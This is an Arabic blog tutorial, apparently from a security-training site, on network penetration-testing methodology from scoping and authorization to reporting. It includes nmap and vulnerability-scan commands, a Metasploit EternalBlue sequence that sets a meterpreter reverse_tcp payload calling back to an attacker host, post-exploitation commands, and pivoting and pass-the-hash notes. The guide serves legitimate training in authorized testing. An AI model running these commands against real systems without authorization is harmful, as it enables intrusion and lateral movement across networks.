اختبار اختراق الشبكات 2026: المنهجية والأدوات والعملية الكاملة
7 سبتمبر 2026 · بواسطة Pentevo
اختبار اختراق الشبكات هو أحد أكثر تقييمات الأمن شيوعاً للمؤسسات. يحاكي مهاجماً حقيقياً يحاول اختراق الشبكة المؤسسية — كاشفاً الأنظمة القابلة للاستغلال قبل أن يكتشفها مهاجم فعلي.
يوضح هذا الدليل المنهجية الكاملة من تحديد النطاق حتى إعداد التقارير.
مراحل اختبار اختراق الشبكات
المرحلة 1: تحديد النطاق والتخطيط
قبل تنفيذ أي أمر:
- قواعد التفاعل (RoE): ما هي عناوين IP/الشبكات الفرعية ضمن النطاق؟
- نافذة الاختبار: متى يُسمح بالاختبار؟
- جهة الاتصال في حالات الطوارئ: من يُخطر إذا تأثرت الأنظمة الحيوية؟
- التفويض الكتابي: إلزامي قبل بدء أي اختبار
المرحلة 2: الاستطلاع
الاستطلاع السلبي (دون تفاعل مباشر مع الأنظمة المستهدفة):
# معلومات WHOIS
whois targetcompany.com
# استعراض DNS
dig targetcompany.com ANY
dnsrecon -d targetcompany.com -t std
# Shodan (دون الاتصال المباشر بالهدف)
# بحث: org:"Target Company"
OSINT: LinkedIn لهيكل المنظمة، إعلانات الوظائف (تكشف التقنيات المستخدمة)، Google Dorking للوحات الإدارة المكشوفة.
الاستطلاع النشط (تتصل الأنظمة المستهدفة — النطاق المصرح فقط):
# اكتشاف المضيفين (أي المضيفون نشطون؟)
nmap -sn 10.10.10.0/24 # مسح ping
المرحلة 3: مسح المنافذ وتعداد الخدمات
Nmap: الأداة القياسية
# مسح كامل (جميع المنافذ الـ 65535 — شامل لكن بطيء)
nmap -p- -sV -sC -oA fullscan 10.10.10.0/24
# مسح أولي سريع (أعلى 1000 منفذ)
nmap -sV -sC -O 10.10.10.0/24 -oN scan_results.txt
# مسح UDP (غالباً ما يُنسى — SNMP وDNS وDHCP على UDP)
nmap -sU --top-ports 100 10.10.10.1
# مسح عدواني مع اكتشاف نظام التشغيل
nmap -A -T4 10.10.10.1
تفسير الخدمات المكتشفة:
PORT SERVICE VERSION
22/tcp ssh OpenSSH 7.6 (Ubuntu)
80/tcp http Apache 2.4.29
445/tcp microsoft-ds Windows Server 2019
3389/tcp ms-wbt-server Microsoft Terminal Services
→ SSH 7.6 قديم مع ثغرات معروفة. Windows Server 2019 على المنفذ 445 → SMB، يستحق التحقق من متغيرات EternalBlue.
المرحلة 4: فحص الثغرات
# سكريبتات NSE الخاصة بـ Nmap للثغرات المعروفة
nmap --script vuln 10.10.10.1
# فحوصات SMB المحددة
nmap --script smb-vuln* -p 445 10.10.10.1
# Nikto لتطبيقات الويب
nikto -h http://10.10.10.1
Nessus (تجاري، المعيار الصناعي):
- الطبقة الأساسية: مجانية حتى 32 IP
- يحدد آلاف CVE المعروفة تلقائياً
- درجات CVSS وإرشادات المعالجة مدمجة
- تقارير PDF/HTML قابلة للتصدير
المرحلة 5: الاستغلال
بعد تحديد الثغرات القابلة للاستغلال:
Metasploit Framework:
msfconsole
# مثال: EternalBlue (MS17-010) على Windows 7/Server 2008
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.100
run
الاستغلال اليدوي:
# searchsploit — قاعدة بيانات الاستغلال المحلية
searchsploit "Apache 2.4.29"
المرحلة 6: ما بعد الاستغلال والحركة الجانبية
بعد الوصول الأولي:
# Meterpreter: معلومات النظام
sysinfo
getuid
# واجهات الشبكة على المضيف المخترق
ipconfig # (Windows) أو ifconfig (Linux)
# اقتراحات لتصعيد الامتيازات المحلية
run post/multi/recon/local_exploit_suggester
الحركة الجانبية:
- استخدام بيانات الاعتماد المحصودة على أنظمة أخرى
- Pass-the-Hash (بيئات Windows NTLM)
- إعادة استخدام مفاتيح SSH (بيئات Linux/Unix)
- التحرك عبر مضيفين مخترقين نحو شرائح معزولة
# توجيه Metasploit عبر المضيف المخترق
route add 192.168.1.0 255.255.255.0 [SESSION_ID]
# المضيفون الداخليون 192.168.1.x أصبحوا متاحين الآن
المرحلة 7: إعداد التقارير
يتضمن تقرير اختبار الاختراق الاحترافي:
الملخص التنفيذي (غير تقني):
- تقييم المخاطر العام (حرج/عالٍ/متوسط/منخفض)
- أهم 3 نتائج بلغة بسيطة
- خارطة طريق للمعالجة ذات أولويات
قالب النتيجة التقنية:
العنوان: SMB EternalBlue (MS17-010) على 10.10.10.5
درجة CVSS: 9.8 (حرجة)
الأنظمة المتأثرة: Windows Server 2012 R2
الدليل: [لقطة شاشة لشل Meterpreter بامتيازات SYSTEM]
الوصف: الهدف يشغل نسخة غير مُرقَّعة من SMB...
التوصية: تطبيق التحديث KB4012212، تعطيل SMBv1 عبر GPO
النتائج الشائعة في شبكات المؤسسات
- أنظمة Windows غير مُرقَّعة (ثغرات SMB، PrintNightmare، Log4Shell)
- بيانات اعتماد افتراضية على أجهزة الشبكة
- بروتوكولات غير مشفرة لواجهات الإدارة الداخلية (Telnet، HTTP، FTP)
- بنية شبكة مسطحة بدون تجزئة
- SNMP مع سلسلة المجتمع الافتراضية "public"
- حسابات خدمة قابلة للـ Kerberoasting بكلمات مرور ضعيفة
تغطي أكاديمية Pentevo أمان الشبكات كموضوع أساسي في CEH — مجاناً تماماً، مع مختبرات عملية تعزز المنهجية الموضحة هنا.
الأسئلة الشائعة
ما الفرق بين اختبار الاختراق الداخلي والخارجي؟
اختبار الاختراق الخارجي يحاكي هجوماً من الإنترنت على الأنظمة المتاحة للعموم (خوادم الويب، بوابات VPN، خوادم البريد الإلكتروني). أما الاختبار الداخلي فيحاكي مستخدماً داخلياً مخترقاً أو جهازاً مصاباً — يختبر الحركة الجانبية والتجزئة والأنظمة الداخلية. معظم اختبارات المؤسسات تشمل المرحلتين.
ما هي الشهادات المطلوبة لاختبار اختراق الشبكات؟
OSCP (Offensive Security Certified Professional) هو المعيار الذهبي في الصناعة. eJPT نقطة بداية ممتازة. CEH مقبول على نطاق واسع في دول الخليج والشرق الأوسط. Network+ أو CCNA يوفران معرفة أساسية مفيدة.
ما هي التكاليف النموذجية لاختبار اختراق الشبكات الاحترافي؟
للمؤسسات الصغيرة والمتوسطة: 3,000–15,000 دولار حسب النطاق. للبيئات المؤسسية مع Active Directory وعدة مواقع: 15,000–50,000 دولار أو أكثر. اختبارات الفريق الأحمر (الأكثر واقعية): 30,000–100,000 دولار أو أكثر.
ماذا يجب أن يتضمن تقرير اختبار الاختراق؟
ملخص تنفيذي (غير تقني، للإدارة)، قسم تقني بجميع النتائج (الثغرة، درجة CVSS، دليل/لقطات شاشة، توصيات)، تحديد أولويات المخاطر (حرجة/عالية/متوسطة/منخفضة)، خطوات إعادة الإنتاج، وإرشادات معالجة محددة.
مقالات ذات صلة
الهندسة الاجتماعية — كيف يخترق المهاجمون البشر لا الأنظمة 2026
شرح شامل للهندسة الاجتماعية: Phishing، Vishing، Pretexting، Baiting. كيف تعمل وكيف تحمي نفسك ومؤسستك منها.
Fundamentalsما هو اختبار الاختراق؟ دليل المبتدئين (2026)
دليل مبسّط لاختبار الاختراق: ما هو، والمراحل الخمس، وأنواعه الرئيسية، وكيف يختلف عن فحص الثغرات.
Fundamentalsأهم 10 مخاطر في OWASP، مشروحة ببساطة (2026)
جولة مبسّطة في قائمة OWASP Top 10 لأهم مخاطر أمن تطبيقات الويب — ماذا تعني كل فئة وكيف يخفّفها المدافعون.
Fundamentalsثغرات اليوم صفر: شرح كامل (2026)
ما هي ثغرة اليوم صفر، ولماذا هي بالغة الخطورة، وكيف تُستخدم هجمات اليوم صفر، وما الذي يستطيع المدافعون فعله حيال المجهول.
طبّق هذا عمليًا
أكاديمية Pentevo تحوّل هذه المفاهيم إلى دروس موجّهة وفيديوهات واختبارات — مجانًا.
ابدأ التعلّم مجانًا